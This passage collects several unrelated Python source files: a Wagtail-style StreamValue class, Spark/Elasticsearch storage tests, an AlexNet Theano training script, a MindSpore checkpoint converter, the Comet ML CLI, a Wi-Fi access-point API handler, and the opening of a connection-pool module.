        Extends BoundBlock with methods that make logical sense in the context of
        children of StreamField, but not necessarily elsewhere that BoundBlock is used
        """

        def __init__(self, *args, **kwargs):
            # `id` is required (popped, so a missing kwarg raises KeyError)
            self.id = kwargs.pop("id")
            super(StreamValue.StreamChild, self).__init__(*args, **kwargs)

        @property
        def block_type(self):
            """
            Syntactic sugar so that we can say child.block_type instead of child.block.name.
            (This doesn't belong on BoundBlock itself because the idea of block.name denoting
            the child's "type" ('heading', 'paragraph' etc) is unique to StreamBlock, and in the
            wider context people are liable to confuse it with the block class (CharBlock etc).
            """
            return self.block.name

    def __init__(self, stream_block, stream_data, is_lazy=False, raw_text=None):
        """
        Construct a StreamValue linked to the given StreamBlock,
        with child values given in stream_data.
        Passing is_lazy=True means that stream_data is raw JSONish data as stored
        in the database, and needs to be converted to native values
        (using block.to_python()) when accessed. In this mode, stream_data is a
        list of dicts, each containing 'type' and 'value' keys.
        Passing is_lazy=False means that stream_data consists of immediately usable
        native values. In this mode, stream_data is a list of (type_name, value)
        or (type_name, value, id) tuples.
        raw_text exists solely as a way of representing StreamField content that is
        not valid JSON; this may legitimately occur if an existing text field is
        migrated to a StreamField. In this situation we return a blank StreamValue
        with the raw text accessible under the `raw_text` attribute, so that migration
        code can be rewritten to convert it as desired.
        """
        self.is_lazy = is_lazy
        self.stream_block = (
            stream_block  # the StreamBlock object that handles this value
        )
        self.stream_data = stream_data  # a list of (type_name, value) tuples
        self._bound_blocks = (
            {}
        )  # populated lazily from stream_data as we access items through __getitem__
        self.raw_text = raw_text

    def __getitem__(self, i):
        # Bind (and, when lazy, convert) the i-th child on first access;
        # afterwards serve it from the _bound_blocks cache.
        if i not in self._bound_blocks:
            if self.is_lazy:
                raw_value = self.stream_data[i]
                type_name = raw_value["type"]
                child_block = self.stream_block.child_blocks[type_name]
                if hasattr(child_block, "bulk_to_python"):
                    # convert every child of this type in one batch
                    self._prefetch_blocks(type_name, child_block)
                    return self._bound_blocks[i]
                else:
                    value = child_block.to_python(raw_value["value"])
                    block_id = raw_value.get("id")
            else:
                # native tuples: (type, value) or (type, value, id)
                try:
                    type_name, value, block_id = self.stream_data[i]
                except ValueError:
                    type_name, value = self.stream_data[i]
                    block_id = None
                child_block = self.stream_block.child_blocks[type_name]
            self._bound_blocks[i] = StreamValue.StreamChild(
                child_block, value, id=block_id
            )
        return self._bound_blocks[i]

    def _prefetch_blocks(self, type_name, child_block):
        """Prefetch all child blocks for the given `type_name` using the
        given `child_blocks`.
        This prevents n queries for n blocks of a specific type.
        """
        # create a mapping of all the child blocks matching the given block type,
        # mapping (index within the stream) => (raw block value)
        raw_values = OrderedDict(
            (i, item["value"])
            for i, item in enumerate(self.stream_data)
            if item["type"] == type_name
        )
        # pass the raw block values to bulk_to_python as a list
        converted_values = child_block.bulk_to_python(raw_values.values())
        # reunite the converted values with their stream indexes
        for i, value in zip(raw_values.keys(), converted_values):
            # also pass the block ID to StreamChild, if one exists for this stream index
            block_id = self.stream_data[i].get("id")
            self._bound_blocks[i] = StreamValue.StreamChild(
                child_block, value, id=block_id
            )

    def get_prep_value(self):
        """Return the JSONish list-of-dicts form for database storage,
        guaranteeing every item carries an id."""
        prep_value = []
        for i, stream_data_item in enumerate(self.stream_data):
            if self.is_lazy and i not in self._bound_blocks:
                # This child has not been accessed as a bound block, so its raw JSONish
                # value (stream_data_item here) is still valid
                prep_value_item = stream_data_item
                # As this method is preparing this value to be saved to the database,
                # this is an appropriate place to ensure that each block has a unique id.
                prep_value_item["id"] = prep_value_item.get("id", str(uuid.uuid4()))
            else:
                # convert the bound block back into JSONish data
                child = self[i]
                # As this method is preparing this value to be saved to the database,
                # this is an appropriate place to ensure that each block has a unique id.
                child.id = child.id or str(uuid.uuid4())
                prep_value_item = {
                    "type": child.block.name,
                    "value": child.block.get_prep_value(child.value),
                    "id": child.id,
                }
            prep_value.append(prep_value_item)
        return prep_value

    def __eq__(self, other):
        # equality is by underlying stream_data, not by bound-block identity
        if not isinstance(other, StreamValue):
            return False
        return self.stream_data == other.stream_data

    def __len__(self):
        return len(self.stream_data)

    def __repr__(self):
        # forces binding of every child via list(self)
        return repr(list(self))

    def render_as_block(self, context=None):
        return self.stream_block.render(self, context=context)

    def __html__(self):
        return self.stream_block.render(self)

    def __str__(self):
        return self.__html__()
|
# Copyright (c) 2020, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from unittest import mock
import pyspark.sql.functions as F
from datetime import datetime
from dateutil.tz import tzutc
from undecorated import undecorated
from sparktestingbase.sqltestcase import SQLTestCase
class TestEsStorage(SQLTestCase):
    """Unit tests for EsStorage. The Spark session getter is mocked, so no
    real Spark or Elasticsearch is touched; assertions inspect the mocked
    read.format(...).options(...).load(...) call chain."""

    def setUp(self):
        super(TestEsStorage, self).setUp()
        # patch the session factory so EsStorage never builds a real session
        self.patcher = mock.patch('es_retriever.spark.get_or_create_spark_session')
        self.mock_session = self.patcher.start()

    def tearDown(self):
        # undo the patch so other test classes see the real function
        self.patcher.stop()

    def test_instance(self):
        """EsStorage exposes the expected attributes and constructor wiring."""
        from es_retriever.es.storage import EsStorage
        from es_retriever.config import Config
        self.config = Config()
        es_storage = EsStorage(
            self.config,
            session_getter=self.mock_session
        )
        self.assertTrue(hasattr(es_storage, 'base_index'))
        self.assertTrue(hasattr(es_storage, 'index_type'))
        self.assertTrue(hasattr(es_storage, 'es_read_config'))
        self.assertTrue(hasattr(es_storage, 'time_formatter'))
        self.assertTrue(hasattr(es_storage, 'timestamp_column'))
        self.assertTrue(hasattr(es_storage, 'cluster_status_to_color'))
        self.assertEqual(es_storage.format, 'org.elasticsearch.spark.sql')
        self.assertEqual(es_storage.session_getter, self.mock_session)
        self.assertEqual(es_storage.config, self.config)

    def test_get_no_filter_condition(self):
        """get() without a filter loads the per-day indices for [since, until]
        and applies only the implicit timestamp filter."""
        from es_retriever.es.storage import EsStorage
        from es_retriever.config import Config
        self.config = Config(
            es_base_index='test_index',
            es_index_type='test_type'
        )
        es_storage = EsStorage(
            self.config,
            session_getter=self.mock_session
        )
        since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
        until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
        # undecorated() strips the decorator from get() so the raw method
        # body runs; `es_storage` is passed explicitly as `self`.
        undecorated(es_storage.get)(es_storage, since, until)
        # handles into the mocked session.read.format(...).options(...).load(...)
        format = self.mock_session.return_value.read.format
        options = format.return_value.options
        load = options.return_value.load
        df_ = load.return_value
        format.assert_called_once_with(
            'org.elasticsearch.spark.sql'
        )
        options.assert_called_once_with(
            **es_storage.es_read_config
        )
        # one comma-separated daily index per day in the range
        load.assert_called_once_with(
            'test_index-2018.01.01,test_index-2018.01.02/test_type'
        )
        df_.filter.assert_called_once()
        # df_ = df_.filter.return_value
        columns = df_.columns
        df_.filter.return_value.select.assert_called_once_with(columns)

    def test_get_with_filter_condition(self):
        """get() ANDs a caller-supplied filter with the timestamp-range filter."""
        from es_retriever.es.storage import EsStorage
        from es_retriever.config import Config
        mock_filter = mock.MagicMock()
        self.config = Config(
            es_base_index='test_index',
            es_index_type='test_type'
        )
        es_storage = EsStorage(
            self.config,
            session_getter=self.mock_session,
        )
        since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
        until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
        # expected implicit filter built the same way the storage builds it
        date_time_filter = (F.col('@timestamp') >= since) & \
                           (F.col('@timestamp') <= until)
        undecorated(es_storage.get)(
            es_storage,
            since,
            until,
            filter_condition=mock_filter
        )
        format = self.mock_session.return_value.read.format
        options = format.return_value.options
        load = options.return_value.load
        df_ = load.return_value
        format.assert_called_once_with(
            'org.elasticsearch.spark.sql'
        )
        options.assert_called_once_with(
            **es_storage.es_read_config
        )
        load.assert_called_once_with(
            'test_index-2018.01.01,test_index-2018.01.02/test_type'
        )
        df_.filter.assert_called_once()
        df_.filter.assert_called_once_with(mock_filter & date_time_filter)
        df_ = df_.filter.return_value
        columns = df_.columns
        df_.select.assert_called_once_with(columns)

    def test_get_with_extra_config(self):
        """get() merges extra_config over the default es_read_config options."""
        from es_retriever.es.storage import EsStorage
        from es_retriever.config import Config
        extra_config = {'test1': 'test_value1'}
        self.config = Config(
            es_base_index='test_index',
            es_index_type='test_type'
        )
        es_storage = EsStorage(
            self.config,
            session_getter=self.mock_session,
        )
        since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
        until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
        undecorated(es_storage.get)(
            es_storage,
            since,
            until,
            extra_config=extra_config
        )
        format = self.mock_session.return_value.read.format
        options = format.return_value.options
        load = options.return_value.load
        df_ = load.return_value
        # expected options: read config overlaid with the extras
        config = es_storage.es_read_config.copy()
        config.update(extra_config)
        format.assert_called_once_with(
            'org.elasticsearch.spark.sql'
        )
        options.assert_called_once_with(
            **config
        )
        load.assert_called_once_with(
            'test_index-2018.01.01,test_index-2018.01.02/test_type'
        )
        df_.filter.assert_called_once()
        df_ = df_.filter.return_value
        columns = df_.columns
        df_.select.assert_called_once_with(columns)
|
import sys
import time
from multiprocessing import Process, Queue
import yaml
import numpy as np
import zmq
import logging
# set up logging to file - see previous section for more details
from datetime import datetime
# Root logger writes INFO+ to a log file; filemode='w' truncates it each run.
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s - %(message)s',
                    datefmt='%y-%m-%d %H:%M:%S',
                    filename='./alexnet_time_tmp.log',
                    filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
# Now, define a couple of other loggers which might represent areas in your
# application:
logger = logging.getLogger('AlexNet.timming')
sys.path.append('./lib')
from tools import (save_weights, load_weights,
save_momentums, load_momentums)
from train_funcs import (unpack_configs, adjust_learning_rate,
get_val_error_loss, get_rand3d, train_model_wrap,
proc_configs)
def train_net(config):
    """Train AlexNet with Theano (Python 2 code).

    When config['para_load'] is set, minibatches are loaded by a separate
    process and exchanged over zmq plus the queue_t2l / queue_l2t queues;
    otherwise loading happens in-process. Validates once per epoch and
    snapshots weights/momentums every `snapshot_freq` epochs.
    """
    # UNPACK CONFIGS
    (flag_para_load, train_filenames, val_filenames,
     train_labels, val_labels, img_mean) = unpack_configs(config)
    if flag_para_load:
        # zmq set up
        sock = zmq.Context().socket(zmq.PAIR)
        sock.connect('tcp://localhost:{0}'.format(config['sock_data']))
        load_send_queue = config['queue_t2l']
        load_recv_queue = config['queue_l2t']
    else:
        load_send_queue = None
        load_recv_queue = None
    # import after process start so theano binds to this process's GPU context
    import theano
    theano.config.on_unused_input = 'warn'
    if config['flag_top_5']:
        flag_top5 = True
    else:
        flag_top5 = False
    from layers import DropoutLayer
    from alex_net import AlexNet, compile_models
    ## BUILD NETWORK ##
    model = AlexNet(config)
    layers = model.layers
    batch_size = model.batch_size
    ## COMPILE FUNCTIONS ##
    (train_model, validate_model, train_error, learning_rate,
     shared_x, shared_y, rand_arr, vels) = compile_models(model, config, flag_top_5=flag_top5)
    ######################### TRAIN MODEL ################################
    print '... training'
    if flag_para_load:
        # hand the shared input buffer and image mean to the loader process
        sock.send_pyobj((shared_x))
        load_send_queue.put(img_mean)
    n_train_batches = len(train_filenames)
    minibatch_range = range(n_train_batches)
    # Start Training Loop
    epoch = 0
    step_idx = 0
    val_record = []
    while epoch < config['n_epochs']:
        epoch = epoch + 1
        if config['shuffle']:
            print ('shuffle')
            np.random.shuffle(minibatch_range)
        if config['resume_train'] and epoch == 1:
            # resume: restore weights, learning rate and momentums, then
            # jump the epoch counter past the loaded checkpoint
            print ('config')
            load_epoch = config['load_epoch']
            load_weights(layers, config['weights_dir'], load_epoch)
            lr_to_load = np.load(
                config['weights_dir'] + 'lr_' + str(load_epoch) + '.npy')
            learning_rate.set_value(lr_to_load)
            #val_record = list(
            #    np.load(config['weights_dir'] + 'val_record.npy'))
            load_momentums(vels, config['weights_dir'], load_epoch)
            epoch = load_epoch + 1
        if flag_para_load:
            print ('flag_para_load')
            # send the initial message to load data, before each epoch
            load_send_queue.put(str(train_filenames[minibatch_range[0]]))
            load_send_queue.put(get_rand3d())
            # clear the sync before 1st calc
            load_send_queue.put('calc_finished')
        count = 0
        for minibatch_index in minibatch_range:
            num_iter = (epoch - 1) * n_train_batches + count
            count = count + 1
            # rough throughput measurement over iterations 1..20
            if count == 1:
                s = time.time()
            if count == 20:
                e = time.time()
                print "time per 20 iter:", (e - s)
                logger.info("time per 20 iter: %lf" % (e - s))
            cost_ij = train_model_wrap(train_model, shared_x,
                                       shared_y, rand_arr, img_mean,
                                       count, minibatch_index,
                                       minibatch_range, batch_size,
                                       train_filenames, train_labels,
                                       flag_para_load,
                                       config['batch_crop_mirror'],
                                       send_queue=load_send_queue,
                                       recv_queue=load_recv_queue)
            if num_iter % config['print_freq'] == 0:
                logger.info("training @ iter = %i" % (num_iter))
                logger.info("training cost: %lf" % (cost_ij))
                if config['print_train_error']:
                    logger.info('training error rate: %lf' % train_error())
            if flag_para_load and (count < len(minibatch_range)):
                # tell the loader the GPU is free for the next prefetch
                load_send_queue.put('calc_finished')
        ############### Test on Validation Set ##################
        #"""
        # dropout must be disabled for deterministic validation
        DropoutLayer.SetDropoutOff()
        result_list = get_val_error_loss(
            rand_arr, shared_x, shared_y,
            val_filenames, val_labels,
            flag_para_load, img_mean,
            batch_size, validate_model,
            send_queue=load_send_queue,
            recv_queue=load_recv_queue,
            flag_top_5=flag_top5)
        logger.info(('epoch %i: validation loss %f ' %
                     (epoch, result_list[-1])))
        if flag_top5:
            logger.info(('epoch %i: validation error (top 1) %f %%, (top5) %f %%' %
                         (epoch, result_list[0] * 100., result_list[1] * 100.)))
        else:
            logger.info(('epoch %i: validation error %f %%' %
                         (epoch, result_list[0] * 100.)))
        val_record.append(result_list)
        np.save(config['weights_dir'] + 'val_record.npy', val_record)
        DropoutLayer.SetDropoutOn()
        ############################################
        # Adapt Learning Rate
        step_idx = adjust_learning_rate(config, epoch, step_idx,
                                        val_record, learning_rate)
        # Save weights
        if epoch % config['snapshot_freq'] == 0:
            save_weights(layers, config['weights_dir'], epoch)
            np.save(config['weights_dir'] + 'lr_' + str(epoch) + '.npy',
                    learning_rate.get_value())
            save_momentums(vels, config['weights_dir'], epoch)
        #"""
    print('Optimization complete.')
if __name__ == '__main__':
    # Merge spec.yaml over config.yaml (Python 2: dict.items() returns lists,
    # so `+` concatenates; later keys win inside dict()).
    # NOTE(review): yaml.load without an explicit Loader is unsafe on
    # untrusted input — these are local project files, but consider
    # yaml.safe_load.
    with open('config.yaml', 'r') as f:
        config = yaml.load(f)
    with open('spec.yaml', 'r') as f:
        config = dict(config.items() + yaml.load(f).items())
    config = proc_configs(config)
    if config['para_load']:
        # parallel loading: a dedicated process feeds minibatches, synced
        # through a pair of size-1 queues
        from proc_load import fun_load
        config['queue_l2t'] = Queue(1)
        config['queue_t2l'] = Queue(1)
        train_proc = Process(target=train_net, args=(config,))
        print 'config : ',config
        load_proc = Process(
            target=fun_load, args=(config, config['sock_data']))
        train_proc.start()
        load_proc.start()
        train_proc.join()
        load_proc.join()
    else:
        """
        train_proc = Process(target=train_net, args=(config,))
        train_proc.start()
        train_proc.join()
        """
        train_net(config)
|
<reponame>mindspore-ai/models<filename>research/cv/midas/src/utils/pth2ckpt.py
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""pth2ckpt."""
import sys
from mindspore import Tensor
from mindspore.train.serialization import save_checkpoint
import torch
import numpy as np
def pytorch2mindspore():
    """Convert a PyTorch checkpoint (path given in sys.argv[1]) to a
    MindSpore checkpoint file named 'midas_pth.ckpt'.

    Keys are renamed from the PyTorch naming scheme to the MindSpore
    backbone naming scheme; grouped conv2 weights are split into 32
    per-branch conv weights.
    """
    state = torch.load(sys.argv[1], map_location='cpu')
    converted = []
    for key in state:
        print(key)
        tensor = state[key]
        # Generic renames applied to every key (first occurrence only).
        key = key.replace('layer', 'backbone_layer', 1)
        key = key.replace('running_mean', 'moving_mean', 1)
        key = key.replace('running_var', 'moving_variance', 1)
        if key.endswith('conv2.weight'):
            # Grouped convolution: split the stacked weight into 32
            # individual 'convs.<i>.weight' parameters.
            prefix = key[:key.rfind('weight')]
            for idx, chunk in enumerate(np.split(tensor.numpy(), 32)):
                converted.append({'name': prefix + 'convs.' + str(idx) + '.weight',
                                  'data': Tensor(chunk)})
            continue
        if key.startswith('bn1'):
            key = key.replace('bn1', 'backbone_bn', 1)
            key = key.replace('bias', 'beta', 1)
            key = key.replace('weight', 'gamma', 1)
        if key.startswith('conv1.weight'):
            key = 'backbone_conv.weight'
        # Stem layer remapping.
        if key.endswith('layer1.0.weight'):
            key = 'backbone_conv.weight'
        if key.endswith('layer1.1.weight'):
            key = 'backbone_bn.gamma'
        if key.endswith('layer1.1.bias'):
            key = 'backbone_bn.beta'
        # BatchNorm parameter renames: weight -> gamma, bias -> beta.
        # At most one suffix matches, so looping preserves the original
        # sequential-if behavior.
        for bn in ('bn1.', 'bn2.', 'bn3.'):
            if key.endswith(bn + 'weight'):
                key = key[:key.rfind('weight')] + 'gamma'
            if key.endswith(bn + 'bias'):
                key = key[:key.rfind('bias')] + 'beta'
        if key.find('downsample') != -1:
            key = key.replace("downsample.1", 'down_sample.bn')
            key = key.replace("bn.weight", 'bn.gamma')
            key = key.replace("bias", 'beta')
            key = key.replace("downsample.0.weight", 'down_sample.conv.weight')
        print("----------------", key)
        converted.append({'name': key, 'data': Tensor(tensor.numpy())})
    save_checkpoint(converted, 'midas_pth.ckpt')
if __name__ == '__main__':
    # CLI entry point: expects the source .pth path as the first argument.
    pytorch2mindspore()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# *******************************************************
# ____ _ _
# / ___|___ _ __ ___ ___| |_ _ __ ___ | |
# | | / _ \| '_ ` _ \ / _ \ __| | '_ ` _ \| |
# | |__| (_) | | | | | | __/ |_ _| | | | | | |
# \____\___/|_| |_| |_|\___|\__(_)_| |_| |_|_|
#
# Sign up for free at http://www.comet.ml
# Copyright (C) 2015-2020 Comet ML INC
# This file can not be copied and/or distributed without
# the express permission of Comet ML Inc.
# *******************************************************
"""
Examples:
comet upload file.zip ...
comet upload --force-reupload file.zip ...
comet optimize script.py optimize.config
comet optimize -j 4 script.py optimize.config
comet optimize -j 4 script.py optimize.config -- arg1 --flag arg2
comet bootstrap_dir
comet python script.py
comet python -p /usr/bin/python3.6 script.py
comet offline 60a1a617e4c24c8998cc78fa3bc7a31b.zip
comet offline --csv 60a1a617e4c24c8998cc78fa3bc7a31b.zip
comet check
comet init
comet models
Note that `comet optimize` requires your COMET_API_KEY
be configured in the environment, or in your .comet.config
file. For example:
COMET_API_KEY=74345364546 comet optimize ...
For more information:
comet COMMAND --help
"""
from __future__ import print_function
import argparse
import os.path
import sys
from comet_ml import __version__
# Import CLI commands:
from . import (
comet_check,
comet_init,
comet_models,
comet_offline,
comet_optimize,
comet_python,
comet_upload,
)
def bootstrap_dir(args):
    """ Print the bootstrap dir to include in PYTHONPATH for automatic early
    SDK initialization. See also `comet python` that set it automatically.
    """
    # Imported lazily so the CLI can start even before comet_ml is needed.
    import comet_ml.bootstrap

    # No trailing newline, so shells can capture the path verbatim.
    print(os.path.dirname(comet_ml.bootstrap.__file__), end="")
def add_subparser(subparsers, module, name):
    """Register one CLI command module under `name`.

    The module must follow the command convention:

    * `module.<name>` is the callable dispatched for the command
    * `module.ADDITIONAL_ARGS` says whether extra args are passed through
    * `module.get_parser_arguments(parser)` adds the command's options
    * `module.__doc__` becomes the subcommand description
    """
    sub = subparsers.add_parser(
        name,
        description=module.__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    sub.set_defaults(
        func=getattr(module, name),
        additional_args=module.ADDITIONAL_ARGS,
    )
    module.get_parser_arguments(sub)
def main(raw_args=None):
    """Parse and dispatch the ``comet`` command line.

    Args:
        raw_args: optional list of argument strings. Defaults to the current
            ``sys.argv[1:]``, resolved at call time. (BUGFIX: the original
            signature used ``raw_args=sys.argv[1:]``, which captured argv once
            at import time — a stale snapshot if argv changes, and the classic
            early-binding default-argument pitfall.)
    """
    if raw_args is None:
        raw_args = sys.argv[1:]

    parser = argparse.ArgumentParser(
        description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
    )
    parser.add_argument(
        "--version",
        help="Display comet_ml version",
        action="store_const",
        const=True,
        default=False,
    )
    subparsers = parser.add_subparsers()
    # Register CLI commands:
    add_subparser(subparsers, comet_check, "check")
    add_subparser(subparsers, comet_models, "models")
    add_subparser(subparsers, comet_offline, "offline")
    add_subparser(subparsers, comet_optimize, "optimize")
    add_subparser(subparsers, comet_python, "python")
    add_subparser(subparsers, comet_upload, "upload")
    add_subparser(subparsers, comet_init, "init")
    # `bootstrap_dir` takes no module-defined options, so register it directly.
    bootstrap_dir_parser = subparsers.add_parser(
        "bootstrap_dir",
        description=bootstrap_dir.__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    bootstrap_dir_parser.set_defaults(func=bootstrap_dir, additional_args=False)

    # First identify the subparser, as some subcommands receive the extra
    # arguments and others do not.
    args, rest = parser.parse_known_args(raw_args)
    # args won't have additional_args if no subcommand was given.
    if hasattr(args, "additional_args") and args.additional_args:
        args.func(args, rest)
    elif args.version:
        print(__version__)
    else:
        # If the subcommand doesn't need extra args, reparse in strict mode so
        # the user gets a nice message in case of an unsupported CLI argument.
        args = parser.parse_args(raw_args)
        if hasattr(args, "func"):
            args.func(args)
        else:
            # comet with no args; call recursively to show help:
            main(["--help"])
if __name__ == "__main__":
    # Invoked as a script: run the CLI with the process arguments.
    main(sys.argv[1:])
|
from json import loads
from controller import BaseHandler
from logging import info, exception
from controller import Net
from module import DbManager, add_user, delete_user, update_user, set_api_response, validate_format, get_string, wifi_ap_info
class WiFiInfo(BaseHandler):
    """API handler for Wi-Fi access-point information.

    Supports two operations ('tipo_operazione'): 'list' (enumerate the Wi-Fi
    networks seen by every AP device and sync them into the device table) and
    'update' (replace the stored default AP credentials). ADMIN-only.
    """

    # Allowed values for the request field 'tipo_operazione' (operation type).
    tipo_operazione = ['list', 'update']

    def post(self):
        """Validate the request, dispatch the operation, and always emit a
        response via set_api_response(); response['output'] is 'OK' or an
        error message string."""
        # str(bytes)[2:-1] strips the "b'...'" repr wrapper from the raw body.
        body = str(self.request.body)[2:-1]
        info("%s %s", self.request.method, self.request.url)
        info("BODY %s", body)
        response = {}
        try:
            response = WiFiInfo.check(self.session.get('user'), self.session.get('role'), self.request, body)
            if response['output'] == 'OK':
                data = self.request.json
                tipo_operazione = data['tipo_operazione']
                wifi = None
                if 'wifi' in data:
                    wifi = data['wifi']
                # Dispatch tables: operation name -> handler / argument list.
                funzioni = {
                    'list': WiFiInfo.wifi_list,
                    'update': WiFiInfo.wifi_update,
                }
                parametri = {
                    'list': [],
                    'update': [wifi]
                }
                response = funzioni[tipo_operazione](*parametri[tipo_operazione])
            else:
                # Route the validation error message through the except path
                # so all failures are reported the same way.
                raise Exception(response['output'])
        except Exception as e:
            exception("Exception")
            response['output'] = str(e)
        finally:
            set_api_response(response, self.response)

    @staticmethod
    def check(user, role, request, body):
        """Validate body format, operation type, user role, and operation
        parameters. Returns {'output': 'OK'} on success, else an error string
        built via get_string() (numeric message codes defined elsewhere)."""
        response = {}
        if body != "" and validate_format(request):
            data = request.json
            if 'tipo_operazione' in data and data['tipo_operazione'] in WiFiInfo.tipo_operazione:
                response = WiFiInfo.check_user(user, role)
                response = WiFiInfo.check_operation_param(response, data)
            else:
                if 'tipo_operazione' in data:
                    # Field present but not one of the supported operations.
                    response['output'] = get_string(24, da_sostituire="tipo_operazione", da_aggiungere=', '.join(WiFiInfo.tipo_operazione))
                else:
                    # Field missing entirely.
                    response['output'] = get_string(23, da_sostituire="tipo_operazione")
        else:
            if body != "":
                # Body present but failed format validation.
                response['output'] = get_string(22)
            else:
                # Empty request body.
                response['output'] = get_string(21)
        return response

    @staticmethod
    def check_user(user, role):
        """Require an authenticated user with the ADMIN role.

        Returns {'output': 'OK'} or an error message dict."""
        response = {}
        if user is not None:
            if role != 'ADMIN':
                response['output'] = get_string(26)
            else:
                response['output'] = 'OK'
        else:
            response['output'] = get_string(25)
        return response

    @staticmethod
    def check_operation_param(response, data):
        """Run operation-specific parameter validation (only 'update' has
        extra parameters); pass prior failures through unchanged."""
        if response['output'] == 'OK':
            if data['tipo_operazione'] == 'update':
                response = WiFiInfo.check_update(data)
        return response

    @staticmethod
    def check_update(data):
        """Validate the 'update' payload: data['wifi'] must exist and carry
        non-empty 'ssid' and 'psw' values."""
        response = {}
        if 'wifi' in data and 'ssid' in data['wifi'] and 'psw' in data['wifi'] and data['wifi']['ssid'] != '' and data['wifi']['psw'] != '':
            response['output'] = 'OK'
        else:
            if 'wifi' in data:
                if 'ssid' in data['wifi']:
                    response['output'] = get_string(27, da_aggiungere="wifi.ssid")
                else:
                    response['output'] = get_string(34, da_sostituire="wifi.ssid")
                # NOTE(review): the psw branch below always overwrites the
                # ssid message just set above — when both fields have problems
                # (or only ssid does), only the psw-related message survives.
                # Confirm this "last error wins" behavior is intended.
                if 'psw' in data['wifi']:
                    response['output'] = get_string(27, da_aggiungere="wifi.psw")
                else:
                    response['output'] = get_string(34, da_sostituire="wifi.psw")
            else:
                response['output'] = get_string(27, da_aggiungere="wifi")
        return response

    @staticmethod
    def wifi_list():
        """Query every AP device for visible Wi-Fi networks, sync them with
        the device table, and return the merged list plus the default AP."""
        response = {}
        ap_list = DbManager.select_tb_net_device_and_msh_info(net_type='AP')
        db_devices = DbManager.select_tb_net_device_and_msh_info()
        wifi_ap_all_list = []
        for ap in ap_list:
            wifi_info = wifi_ap_info(ap['net_ip'], ap['net_usr'], ap['net_psw'], ap['net_code'])
            if wifi_info['output'] == 'OK':
                for wifi in wifi_info['result']:
                    trovato = False  # "found": is this SSID already in the DB?
                    net_config = {
                        "user": ap['net_usr'],
                        "password": ap['net_psw']
                    }
                    # NOTE(review): the SSID is compared against net_mac,
                    # which suggests the SSID doubles as the device key here
                    # — confirm against the DB schema.
                    for db_device in db_devices:
                        if wifi['ssid'] == db_device['net_mac']:
                            DbManager.update_tb_net_device(wifi['ssid'], net_ip=ap['net_ip'], net_config=net_config)
                            trovato = True
                            break
                    if not trovato:
                        wifi['net_code'] = wifi['ssid']
                        wifi['net_mac_info'] = ap['net_mac']
                        trovato = Net.found_duplicate_code(wifi)
                        if trovato:
                            # Duplicate SSID: flag it instead of using it as code.
                            wifi['net_code'] = "SSID duplicato"
                        DbManager.insert_tb_net_device(wifi['ssid'], ap['net_ip'], wifi['ssid'],
                                                       wifi['net_mac_info'])
                wifi_ap_all_list = wifi_ap_all_list + wifi_info['result']
        response['wifi_ap'] = wifi_ap_all_list
        wifi = DbManager.select_tb_wifi()
        if not wifi:
            response['default_ap'] = ""
        else:
            response['default_ap'] = wifi[0]
        response['output'] = 'OK'
        return response

    @staticmethod
    def wifi_update(wifi):
        """Replace the stored default AP with wifi['ssid'] / wifi['psw'].

        The table is treated as single-row: any existing entry is deleted
        before inserting the new one."""
        response = {}
        if DbManager.select_tb_wifi():
            DbManager.delete_tb_wifi()
        DbManager.insert_tb_wifi(wifi['ssid'], wifi['psw'])
        response['output'] = 'OK'
        return response
|
<reponame>FlussuferOrga/ts-gw2-verifyBot
"""
Idea & Base from https://pypi.org/project/connection-pool/ https://github.com/zhouyl/ConnectionPool
Modification by https://github.com/Xyaren
"""
import logging
import queue
import threading
from typing import Callable, ContextManager, Generic, TypeVar
import time
LOG = logging.getLogger(__name__)
class ConnectionInitializationException(Exception):
    """Raised when a new connection could not be instantiated."""


class TooManyConnections(Exception):
    """Raised when the pool is full and non-blocking checkout was requested."""


class Expired(Exception):
    """Base class: the connection is no longer usable and must be destroyed."""


class UsageExceeded(Expired):
    """The number of uses of the connection exceeds the configured limit."""


class TtlExceeded(Expired):
    """The connection's total lifetime exceeds the configured ttl (seconds)."""


class IdleExceeded(Expired):
    """The connection's idle time exceeds the configured idle timeout."""


class Unhealthy(Expired):
    """The connection failed the user-supplied health-test function."""


# Type variable for the pooled connection objects.
_T = TypeVar("_T")
class WrapperConnection(ContextManager[_T]):
    """Wraps a pooled connection and tracks its life-cycle statistics
    (creation time, last-use time, use count) for the owning pool.

    Acts as a context manager: entering yields the raw connection and
    exiting returns the wrapper to the pool.
    """

    connection: _T

    def __init__(self, pool, connection: _T):
        self.pool = pool
        self.connection = connection
        self.usage = 0
        now = time.time()
        self.created = now
        self.last = now

    def using(self):
        """Record one more use of this connection; returns self."""
        self.last = time.time()
        self.usage += 1
        return self

    def reset(self):
        """Clear all life-cycle counters and timestamps."""
        self.usage = 0
        self.last = 0
        self.created = 0

    def __enter__(self) -> _T:
        return self.connection

    def __exit__(self, exc_type, exc_value, traceback):
        # Hand the wrapper back to the pool; exceptions propagate (returns None).
        self.pool.release(self)

    def __str__(self):
        return "WrapperConnection[{}]".format(self.connection)
class ConnectionPool(Generic[_T]):
    """Generic connection pool, usable for pymysql/memcache/redis/...

